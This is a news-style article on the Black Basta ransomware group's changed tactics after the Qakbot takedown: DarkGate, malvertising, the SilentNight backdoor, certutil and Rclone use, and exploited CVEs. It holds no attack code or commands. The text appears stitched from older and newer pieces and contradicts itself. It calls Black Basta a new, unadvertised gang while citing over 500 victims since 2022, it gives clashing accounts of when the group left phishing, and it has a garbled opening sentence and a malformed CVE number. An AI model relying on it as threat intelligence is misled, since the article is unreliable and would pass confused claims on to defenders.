Following last year's takedown of the Qakbot botnet, the Black Basta ransomware group has switched to relying on new custom tools and initial access techniques as part of a shift in strategy, as part of this year's efforts to reduce the threat.
In response to the escalating threat from ransomware gangs, the Black Basta group has demonstrated a great deal of resilience and an ability to adapt due to the addition of new custom tools and tactics that have been developed to conceal their presence.
With a total of over 500 victims compromised, the group's evolution illustrates the resilience of cyber criminals who have had to change tactics based on law enforcement and other disruptions due to the group's evolution, experts say. Although cybercriminals have faced numerous disruptions due to law enforcement, they continue to flourish in their cybercriminal operations. Black Basta has been known to attack several companies around the world and has been known to do so from as early as the second week of April 2022.
Currently, there is not much other information available about the new ransomware gang, since they have not yet advertised themselves to the hacking community or recruited affiliates through hacking forums.
It seems, however, that by how they can rapidly accumulate new victims and how their negotiations have been conducted, they are not necessarily a new operation. They are likely to be rebranding an old top-tier ransomware gang that brought along their affiliates with them.
There is a double-extortion strategy used by the ransomware group, combining data theft and encryption in addition to demanding large ransom payments that can easily reach millions of dollars.
As part of its earlier campaign of gaining access to corporate networks, the ransomware gang previously formed a partnership with the QBot botnet. The ransomware gang, however, had to create new partnerships after law enforcement was able to disrupt the QBot botnet, according to Mandiant, for them to breach the corporate networks of companies.
Further, as part of its monitoring of the UNC4393 threat actors, Mandiant has identified new malware and tools that are being used as part of the Black Basta intrusions, exhibiting the evolution and resilience of the attackers.
Black Basta has had a busier year than most gangs, with its members compromising some of the largest companies and brands in the world, including Veolia North America, Hyundai Motor Europe, and Keytronic.
One of the most telling signs of the sophistication of the threat group is that it has access to zero-day vulnerability exploits, such as the exploit for Windows privilege elevation (2024-26169) and the exploit for VMware ESXi authentication bypass flaw (CVE-2024-37085).
The most defining characteristic of Black Basta is its prolific use of Qakbot, which was distributed through sophisticated, evolving phishing campaigns that gave rise to the company's reputation. As a Trojan initially deployed to gain access to a victim's computer, Qakbot can then deploy a wide array of open-source tools, like the gang's name-branded ransomware, which is publicly available.
After a year or so, the Qakbot botnet went mostly out of commission (though it has re-surfaced since then) as part of a government law enforcement campaign called Operation Duck Hunt in which the group was forced to find new ways of accessing victim infrastructure to conduct their operations.
The Mandiant research team revealed in a blog post published this week that Black Basta initially used phishing and even vishing as a means to spread other types of malware, such as Darkgate and Pikabot, but within a short period began looking for alternative methods to spread many more threats.
According to Mandiant researchers in a post published last month, the group, known as UNC4393, has settled into a phase of transition in recent attacks in which the group is no longer using readily available tools but rather developing custom malware, as well as relying more heavily on access brokers and diversifying the initial access technique.
As a result of the FBI and DOJ shutting down QBot's infrastructure in late 2023, Black Basta turned to other initial access distribution clusters, most notably those delivering DarkGate malware, as a means of gaining access to systems.
In later stages, Black Basta switched to using SilentNight, a tool for the delivery of backdoor malware used for keylogging, to get initial access to their network, which marked a shift away from phishing as the primary method of accessing the network.
For example, one of the process by which the group gains initial access involves deploying a backdoor called SilentNight, which the group used in 2019 and 2021 to gain access, but put on hold until last year when it was reactivated for the second time.
Earlier this year, Black Basta initiated the utilization of a new tactic in their malicious operations by incorporating malvertising efforts, representing a significant deviation from their previously sole reliance on phishing as the initial access method. This shift was highlighted by cybersecurity researchers in a detailed post, emphasizing the strategic evolution of Black Basta's methods.
SilentNight, a sophisticated C/C++ backdoor, has been identified as a critical component of Black Basta's recent campaigns. This malware communicates via HTTP/HTTPS and potentially employs a domain generation algorithm for its command and control (C2) infrastructure. The backdoor boasts a modular framework, which supports an array of plug-ins providing extensive functionality. These capabilities include system control, screenshot capture, keylogging, file management, and cryptocurrency wallet access.
Notably, SilentNight also targets credentials through browser manipulation, making it a versatile and potent tool in Black Basta's arsenal.
Upon gaining access to targeted environments, Black Basta employs a combination of living-off-the-land (LotL) techniques and custom malware to maintain persistence and facilitate lateral movement. This preparation stage precedes the deployment of ransomware. Researchers have noted that the ultimate objective of UNC4393, the group behind Black Basta, is to rapidly gather and exfiltrate as much data as possible.
The collected data is then used in multi-faceted extortion schemes, where the threat of data leakage is leveraged to coerce victims into meeting ransom demands.
Mandiant's latest report indicates a notable transition within Black Basta from the use of publicly available tools to the deployment of internally developed custom malware. This shift underscores the group’s adaptability and the ongoing threat it poses to organizations of all sizes.
A security expert emphasized this resilience, pointing out that despite moving away from phishing—a highly successful cybercrime technique—Black Basta continues to present a significant risk.
Erich Kron, a security awareness advocate at KnowBe4, commented on the group's operational capabilities, noting, "Given the success of this gang, there's no doubt they have a considerable amount of funds stocked away in their war chest, allowing them to develop their tools and improve their ability to attack."
This financial backing enables Black Basta to innovate continuously, enhancing its tools and techniques to outmanoeuvre defences.
Mandiant researchers further stressed the importance for defenders to adopt a proactive stance, fortifying their security measures with cutting-edge technology and up-to-date threat intelligence. Black Basta's recent attacks have continued to exploit "living off the land" binaries and readily available tools, such as the Windows certutil command-line utility for downloading SilentNight and the Rclone tool for data exfiltration.
In conclusion, Black Basta remains a formidable global threat and one of the leading entities in the ransomware landscape. Their ability to adapt and evolve necessitates vigilance and advanced defensive strategies from cybersecurity professionals worldwide.
